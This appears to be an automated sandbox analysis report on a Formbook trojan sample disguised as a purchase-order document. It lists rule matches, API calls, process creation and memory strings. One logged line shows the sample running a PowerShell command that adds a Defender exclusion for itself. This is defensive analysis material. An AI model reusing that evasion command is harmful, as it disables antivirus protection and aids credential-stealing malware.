            Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: initial sample | Static PE information: Filename: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_0042B463 NtClose,7_2_0042B463
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12B60 NtClose,LdrInitializeThunk,7_2_01B12B60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01B12DF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01B12C70
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B135C0 NtCreateMutant,LdrInitializeThunk,7_2_01B135C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B14340 NtSetContextThread,7_2_01B14340
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B14650 NtSuspendThread,7_2_01B14650
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12BA0 NtEnumerateValueKey,7_2_01B12BA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12B80 NtQueryInformationFile,7_2_01B12B80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12BF0 NtAllocateVirtualMemory,7_2_01B12BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12BE0 NtQueryValueKey,7_2_01B12BE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12AB0 NtWaitForSingleObject,7_2_01B12AB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12AF0 NtWriteFile,7_2_01B12AF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12AD0 NtReadFile,7_2_01B12AD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12DB0 NtEnumerateKey,7_2_01B12DB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12DD0 NtDelayExecution,7_2_01B12DD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12D30 NtUnmapViewOfSection,7_2_01B12D30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12D10 NtMapViewOfSection,7_2_01B12D10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12D00 NtSetInformationFile,7_2_01B12D00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12CA0 NtQueryInformationToken,7_2_01B12CA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12CF0 NtOpenProcess,7_2_01B12CF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12CC0 NtQueryVirtualMemory,7_2_01B12CC0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12C00 NtQueryInformationProcess,7_2_01B12C00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12C60 NtCreateKey,7_2_01B12C60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12FB0 NtResumeThread,7_2_01B12FB0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12FA0 NtQuerySection,7_2_01B12FA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12F90 NtProtectVirtualMemory,7_2_01B12F90
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12FE0 NtCreateFile,7_2_01B12FE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12F30 NtCreateSection,7_2_01B12F30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12F60 NtCreateProcessEx,7_2_01B12F60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12EA0 NtAdjustPrivilegesToken,7_2_01B12EA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12E80 NtReadVirtualMemory,7_2_01B12E80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12EE0 NtQueueApcThread,7_2_01B12EE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B12E30 NtWriteVirtualMemory,7_2_01B12E30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B13090 NtSetValueKey,7_2_01B13090
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B13010 NtOpenDirectoryObject,7_2_01B13010
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B139B0 NtGetContextThread,7_2_01B139B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B13D10 NtOpenProcessToken,7_2_01B13D10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Code function: 7_2_01B13D70 NtOpenThread,7_2_01B13D70
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D44650 NtSuspendThread,LdrInitializeThunk,9_2_04D44650
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D44340 NtSetContextThread,LdrInitializeThunk,9_2_04D44340
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04D42CA0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04D42C70
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42C60 NtCreateKey,LdrInitializeThunk,9_2_04D42C60
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42DD0 NtDelayExecution,LdrInitializeThunk,9_2_04D42DD0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04D42DF0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04D42D10
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04D42D30
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04D42EE0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04D42E80
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42FE0 NtCreateFile,LdrInitializeThunk,9_2_04D42FE0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42FB0 NtResumeThread,LdrInitializeThunk,9_2_04D42FB0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42F30 NtCreateSection,LdrInitializeThunk,9_2_04D42F30
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42AD0 NtReadFile,LdrInitializeThunk,9_2_04D42AD0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42AF0 NtWriteFile,LdrInitializeThunk,9_2_04D42AF0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04D42BF0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04D42BE0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04D42BA0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42B60 NtClose,LdrInitializeThunk,9_2_04D42B60
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D435C0 NtCreateMutant,LdrInitializeThunk,9_2_04D435C0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D439B0 NtGetContextThread,LdrInitializeThunk,9_2_04D439B0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42CC0 NtQueryVirtualMemory,9_2_04D42CC0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42CF0 NtOpenProcess,9_2_04D42CF0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42C00 NtQueryInformationProcess,9_2_04D42C00
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42DB0 NtEnumerateKey,9_2_04D42DB0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42D00 NtSetInformationFile,9_2_04D42D00
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42EA0 NtAdjustPrivilegesToken,9_2_04D42EA0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42E30 NtWriteVirtualMemory,9_2_04D42E30
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42F90 NtProtectVirtualMemory,9_2_04D42F90
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42FA0 NtQuerySection,9_2_04D42FA0
            Source: C:\Windows\SysWOW64\unregmp2.exe | Code function: 9_2_04D42F60 NtCreateProcessEx,9_2_04D42F60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42AB0 NtWaitForSingleObject,9_2_04D42AB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D42B80 NtQueryInformationFile,9_2_04D42B80
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43090 NtSetValueKey,9_2_04D43090
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43010 NtOpenDirectoryObject,9_2_04D43010
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43D70 NtOpenThread,9_2_04D43D70
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D43D10 NtOpenProcessToken,9_2_04D43D10
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE8140 NtAllocateVirtualMemory,9_2_00BE8140
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7D00 NtCreateFile,9_2_00BE7D00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7E60 NtReadFile,9_2_00BE7E60
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7FE0 NtClose,9_2_00BE7FE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BE7F40 NtDeleteFile,9_2_00BE7F40
            Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D8F290 appears 105 times
            Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D57E54 appears 101 times
            Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04CFB970 appears 280 times
            Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D45130 appears 58 times
            Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D7EA12 appears 86 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B5F290 appears 105 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B15130 appears 58 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01ACB970 appears 280 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B27E54 appears 110 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B4EA12 appears 86 times
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326590158.000000000122E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1335226544.00000000057A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1328306101.000000000490E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327008085.0000000002E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1336186879.0000000007BF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.00000000016A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001BCD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Binary or memory string: OriginalFilenameZhsW.exe0 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/5@16/10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.log
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmylzck2.c5h.ps1
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unregmp2.exe, 00000009.00000002.3778117405.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722883455.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030E5000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722762496.0000000003094000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe ReversingLabs: Detection: 60%
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Virustotal: Detection: 60%
            Source: unknown Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
            Source: C:\Windows\SysWOW64\unregmp2.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: ucrtbase_clr0400.dll
